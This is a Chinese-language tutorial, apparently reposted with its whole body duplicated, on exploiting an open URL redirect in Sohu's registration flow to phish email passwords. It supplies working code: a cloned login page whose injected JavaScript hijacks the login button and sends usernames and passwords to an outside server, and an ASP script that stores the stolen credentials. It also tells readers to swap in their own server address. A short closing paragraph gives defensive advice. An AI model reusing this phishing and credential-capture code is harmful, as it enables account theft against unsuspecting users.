利用sohu网站URL跳转漏洞欺骗邮箱密码
程序员文章站
2022-03-19 11:20:25
url跳转漏洞遍布各大网站,简单看一下,THE9、sohu等居然都存在这个漏洞!我们就拿sohu为例,讲一下该漏洞。来到sohu的用户注册页面,可以看到,在IE地址栏里,默认写着http://passpo... 08-10-08...
url跳转漏洞遍布各大网站,简单看一下,the9、sohu等居然都存在这个漏洞!我们就拿sohu为例,讲一下该漏洞。来到sohu的用户注册页面,可以看到,在ie地址栏里,默认写着http://passport.sohu.com/web/signup.jsp?appid=1000& ru=http://login.mail.sohu.com/reg/signup_success.jsp。
这串字符中的“signup_success.jsp”页面是做什么的呢?反正sohu免费注册,我们来试一下。原来注册成功后,跳转到了这个页面。如果这个地址是其他地方的呢?现在改掉地址栏地址,替换为it168安全频道的首页:http: //passport.sohu.com/web/signup.jsp?appid=1000&ru=http://safe.it168.com/,然后开始注册。
最后居然跳到了it168安全频道的首页了。
sohu原本的注册流程是这样的:注册--处理注册信息--注册成功--跳转到成功页面--点页面链接自动登录--登录后跳转到mail.sohu.com。
而跳转后的页面我们可以控制,所以流程可以被我们改为:注册--处理注册信息--注册成功--跳转到伪造的登录页面--用户输入密码点登录--提交密码给我们--最后跳转到mail.sohu.com。
下面按照修改后的流程注册。
首先准备好工具,一个伪造的sohu登录页面(欺骗用),一个asp页面(接收发来的密码并保存)。打开mail.sohu.com,照原样复制一份html源代码,为了让用户更容易受骗,还要在登录口写上“请登录”字样(过程见下文)。
因为sohu在登录的地方使用了自己的控件,看不到登录框的代码,操作登录的元素就比较麻烦了,还好微软提供了ietoolbar这个ie的插件,可以看到sohu登录控件的名称,等登录控件加载完成,就可以对他进行操作了。
从抓包的数据中可以看出这个控件使用了ajax,不知道他在页面触发ajax的函数是什么,可能是onclick()也可能是别的,在写代码的时候必须保证让sohu的登录代码在我们提交密码到自己的asp页面(用来保存密码的页面)之后执行。无论他的函数是什么,我们都可以拦截,使用js函数劫持技术,其实就是面向对象语言中的“方法重写”技术。
a.html代码(伪造的登录页面):
........................
</body>
</html>(一直到页面结束的标签)
.....................上面是mail.sohu.com页面的代码,.................
. 我们要加的代码从下面开始, 把“ajaxurltmp”的值改为asp文件的地址:
<script>
var ajaxurltmp = "http://safe.it168.com/a.asp";
//-------------以下为ajax执行部分
var xmlhttp;
function createxmlhttpsss(){
if(window.xmlhttprequest){
xmlhttp = new xmlhttprequest();
}
else if(window.activexobject){
xmlhttp = new activexobject("microsoft.xmlhttp");
}
}
function startrequest(dourl){
createxmlhttpsss();
xmlhttp.onreadystatechange = handlestatechange;
xmlhttp.open("get", dourl, true);
xmlhttp.send(null);
}
function handlestatechange(){
if (xmlhttp.readystate == 4 ){
if (xmlhttp.status == 200 ){
//停一秒,为了让另一个ajax(登录的那个)有时间执行。最后跳转。
settimeout("hrefgo()",1000);
}
}
}
function hrefgo()
{
location.href = 'http://mail.sohu.com/';
}
//----------------------------以上为ajax执行部分
//在点登录的时候执行
var formrrr = document.getelementbyid('ppcontid');
var lgin = formrrr.childnodes[0].childnodes[3].childnodes[1];
lgin.onclick=function(){
alert('aaa');
}
var lgonclick = lgin.onclick;
lgin.onclick = function(){
var time = math.random();
var strper = ajaxurltmp '?
username=' document.getelementbyid('ppcontid').childnodes[0].childnodes[1].childnodes[1].value;
strper =
'&password=' document.getelementbyid('ppcontid').childnodes[0].childnodes[2].childnodes[1].value '&time=' time;
startrequest(strper);
lgonclick();
}
document.getelementbyid('pperrmsg').innerhtml='注册成功!请登录!';
//在点登录的时候执行
</script>
相关重要代码解释(js函数劫持部分):
var lgin = formrrr.childnodes[0].childnodes[3].childnodes[1]; //这里获取”登录“这个按钮。
var lgonclick = lgin.onclick; //先把登录的方法赋给一个变量(这个变量其实是个方法)。
lgin.onclick = function ()
{
。。。。。我的代码,用来调用ajax给asp文件发密码(在这里拦截)
lgonclick(); //原来的代码
}
注意在html代码里把”safe.it168.com/a.asp“替换为你自己的asp文件地址。
asp文件的代码:
<%
kxlzxfile=server.mappath("kxlzx.txt")
set fs=server.createobject("scripting.filesystemobject")
set file=fs.opentextfile(kxlzxfile,8,true,0)
file.writeline("用户名:"&request.querystring("username")& "")
file.writeline("密码:"&request.querystring("password")& "")
file.close
set fs = nothing
%>
很简单的代码,接收到密码后生成一个kxlzx.txt文件,保存密码。把伪造的登录页面a.html(地址为http: //safe.it168.com/a.htm)和保存密码的页面a.asp(地址为http://safe.it168.com/a.asp)上传至一个asp空间里。
现在执行以下我们的流程,首先,打开注册的地址“http://passport.sohu.com/web/signup.jsp?appid= 1000&ru=http://safe.it168.com/a.html”,注册用户“kxlzxtest”,密码为“testtest”,然后提交。
注意看ie地址栏,已经来到了伪造的登录页面,输入密码登录。正常登录,进了邮箱里。
现在查看kxlzx.txt,果然有被盗取的密码!整个伪造的过程就是这样,让用户在不知不觉中上当。
做为普通上网用户,我们不要轻信任何人给出来的网页链接,即使是朋友(因为他也可能是受害者)。而做为程序员更应该注意,当你在设计程序时,尽量不要让用户参与控制流程,特别是敏感的地方。可以想象sohu的这段流程设计本意是为了和其它程序配合,让用户注册后直接跳转。但是由于没有检查来源,也没有检查 post给注册程序的链接是否是sohu自己的页面,最终导致了url欺骗的形成。而这种漏洞在各大网站泛滥,例如九城的登录地址“https: //passport.the9.com/login.php?redurl=http://safe.it168.com”等,如果被人利用,最终会造成很严重的后果。
这串字符中的“signup_success.jsp”页面是做什么的呢?反正sohu免费注册,我们来试一下。原来注册成功后,跳转到了这个页面。如果这个地址是其他地方的呢?现在改掉地址栏地址,替换为it168安全频道的首页:http: //passport.sohu.com/web/signup.jsp?appid=1000&ru=http://safe.it168.com/,然后开始注册。
最后居然跳到了it168安全频道的首页了。
sohu原本的注册流程是这样的:注册--处理注册信息--注册成功--跳转到成功页面--点页面链接自动登录--登录后跳转到mail.sohu.com。
而跳转后的页面我们可以控制,所以流程可以被我们改为:注册--处理注册信息--注册成功--跳转到伪造的登录页面--用户输入密码点登录--提交密码给我们--最后跳转到mail.sohu.com。
下面按照修改后的流程注册。
首先准备好工具,一个伪造的sohu登录页面(欺骗用),一个asp页面(接收发来的密码并保存)。打开mail.sohu.com,照原样复制一份html源代码,为了让用户更容易受骗,还要在登录口写上“请登录”字样(过程见下文)。
因为sohu在登录的地方使用了自己的控件,看不到登录框的代码,操作登录的元素就比较麻烦了,还好微软提供了ietoolbar这个ie的插件,可以看到sohu登录控件的名称,等登录控件加载完成,就可以对他进行操作了。
从抓包的数据中可以看出这个控件使用了ajax,不知道他在页面触发ajax的函数是什么,可能是onclick()也可能是别的,在写代码的时候必须保证让sohu的登录代码在我们提交密码到自己的asp页面(用来保存密码的页面)之后执行。无论他的函数是什么,我们都可以拦截,使用js函数劫持技术,其实就是面向对象语言中的“方法重写”技术。
a.html代码(伪造的登录页面):
........................
</body>
</html>(一直到页面结束的标签)
.....................上面是mail.sohu.com页面的代码,.................
. 我们要加的代码从下面开始, 把“ajaxurltmp”的值改为asp文件的地址:
<script>
var ajaxurltmp = "http://safe.it168.com/a.asp";
//-------------以下为ajax执行部分
var xmlhttp;
function createxmlhttpsss(){
if(window.xmlhttprequest){
xmlhttp = new xmlhttprequest();
}
else if(window.activexobject){
xmlhttp = new activexobject("microsoft.xmlhttp");
}
}
function startrequest(dourl){
createxmlhttpsss();
xmlhttp.onreadystatechange = handlestatechange;
xmlhttp.open("get", dourl, true);
xmlhttp.send(null);
}
function handlestatechange(){
if (xmlhttp.readystate == 4 ){
if (xmlhttp.status == 200 ){
//停一秒,为了让另一个ajax(登录的那个)有时间执行。最后跳转。
settimeout("hrefgo()",1000);
}
}
}
function hrefgo()
{
location.href = 'http://mail.sohu.com/';
}
//----------------------------以上为ajax执行部分
//在点登录的时候执行
var formrrr = document.getelementbyid('ppcontid');
var lgin = formrrr.childnodes[0].childnodes[3].childnodes[1];
lgin.onclick=function(){
alert('aaa');
}
var lgonclick = lgin.onclick;
lgin.onclick = function(){
var time = math.random();
var strper = ajaxurltmp '?
username=' document.getelementbyid('ppcontid').childnodes[0].childnodes[1].childnodes[1].value;
strper =
'&password=' document.getelementbyid('ppcontid').childnodes[0].childnodes[2].childnodes[1].value '&time=' time;
startrequest(strper);
lgonclick();
}
document.getelementbyid('pperrmsg').innerhtml='注册成功!请登录!';
//在点登录的时候执行
</script>
相关重要代码解释(js函数劫持部分):
var lgin = formrrr.childnodes[0].childnodes[3].childnodes[1]; //这里获取”登录“这个按钮。
var lgonclick = lgin.onclick; //先把登录的方法赋给一个变量(这个变量其实是个方法)。
lgin.onclick = function ()
{
。。。。。我的代码,用来调用ajax给asp文件发密码(在这里拦截)
lgonclick(); //原来的代码
}
注意在html代码里把”safe.it168.com/a.asp“替换为你自己的asp文件地址。
asp文件的代码:
<%
kxlzxfile=server.mappath("kxlzx.txt")
set fs=server.createobject("scripting.filesystemobject")
set file=fs.opentextfile(kxlzxfile,8,true,0)
file.writeline("用户名:"&request.querystring("username")& "")
file.writeline("密码:"&request.querystring("password")& "")
file.close
set fs = nothing
%>
很简单的代码,接收到密码后生成一个kxlzx.txt文件,保存密码。把伪造的登录页面a.html(地址为http: //safe.it168.com/a.htm)和保存密码的页面a.asp(地址为http://safe.it168.com/a.asp)上传至一个asp空间里。
现在执行以下我们的流程,首先,打开注册的地址“http://passport.sohu.com/web/signup.jsp?appid= 1000&ru=http://safe.it168.com/a.html”,注册用户“kxlzxtest”,密码为“testtest”,然后提交。
注意看ie地址栏,已经来到了伪造的登录页面,输入密码登录。正常登录,进了邮箱里。
现在查看kxlzx.txt,果然有被盗取的密码!整个伪造的过程就是这样,让用户在不知不觉中上当。
做为普通上网用户,我们不要轻信任何人给出来的网页链接,即使是朋友(因为他也可能是受害者)。而做为程序员更应该注意,当你在设计程序时,尽量不要让用户参与控制流程,特别是敏感的地方。可以想象sohu的这段流程设计本意是为了和其它程序配合,让用户注册后直接跳转。但是由于没有检查来源,也没有检查 post给注册程序的链接是否是sohu自己的页面,最终导致了url欺骗的形成。而这种漏洞在各大网站泛滥,例如九城的登录地址“https: //passport.the9.com/login.php?redurl=http://safe.it168.com”等,如果被人利用,最终会造成很严重的后果。
上一篇: 如何对抗硬件断点之一 调试寄存器
下一篇: 手动脱壳入门第十五篇 FSG 1.33